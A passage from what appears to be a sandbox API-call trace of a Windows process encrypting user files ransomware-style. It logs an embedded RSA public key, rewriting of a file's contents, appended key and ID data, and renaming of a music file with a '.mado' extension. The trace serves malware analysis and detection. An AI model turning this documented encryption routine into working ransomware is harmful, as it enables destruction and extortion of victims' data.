lpDistanceToMoveHigh=0x0) returned 0x0 [0204.766] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xa22b, lpOverlapped=0x0) returned 1 [0204.767] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.767] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.767] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.767] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.768] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.768] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.768] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.768] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.768] GetLastError () returned 0x0 [0204.768] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.768] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.768] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.768] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.768] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa230) returned 0x3b81690 [0204.769] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80cd8 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe448 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80d20 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe460 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe490 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4d8 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4a8 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.769] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c8d0 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe490 | out: hHeap=0x2c0000) returned 1 [0204.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4a8 | out: hHeap=0x2c0000) returned 1 [0204.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4d8 | out: hHeap=0x2c0000) returned 1 [0204.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4d8 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe4a8 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe490 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bc98 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bdb0 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4a8 | out: hHeap=0x2c0000) returned 1 [0204.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe490 | out: hHeap=0x2c0000) returned 1 [0204.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4d8 | out: hHeap=0x2c0000) returned 1 [0204.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.770] GetCurrentThreadId () returned 0x600 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b72560 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.770] GetCurrentThreadId () returned 0x600 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4d8 [0204.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe490 [0204.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4a8 [0204.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe478 [0204.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4f0 [0204.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe4c0 [0204.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe508 [0204.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe490 | out: hHeap=0x2c0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe490 [0204.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4d8 | out: hHeap=0x2c0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bc98 [0204.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe508 | out: hHeap=0x2c0000) returned 1 [0204.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b6bec8 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b6bb80 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe490 | out: hHeap=0x2c0000) returned 1 [0204.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bec8 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4c0 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4f0 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe4a8 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe478 | out: hHeap=0x2c0000) returned 1 [0204.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe460 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80d20 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bdb0 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.774] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0xa226, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0xa226, lpOverlapped=0x0) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.774] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xa22b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.774] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.775] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.775] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.775] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.775] CloseHandle (hObject=0x63c) returned 1 [0204.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x3b74b68 [0204.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b20 | out: hHeap=0x2c0000) returned 1 [0204.776] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VW1UqmIAHdW7i.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vw1uqmiahdw7i.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VW1UqmIAHdW7i.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vw1uqmiahdw7i.wav.mado")) returned 1 [0204.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.777] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.778] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1f26820, ftCreationTime.dwHighDateTime=0x1d5dc20, ftLastAccessTime.dwLowDateTime=0x5e9b3380, ftLastAccessTime.dwHighDateTime=0x1d5e61c, ftLastWriteTime.dwLowDateTime=0x5e9b3380, ftLastWriteTime.dwHighDateTime=0x1d5e61c, nFileSizeHigh=0x0, nFileSizeLow=0x786c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xVVIlnstf9.wav", cAlternateFileName="XVVILN~1.WAV")) returned 1 [0204.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) 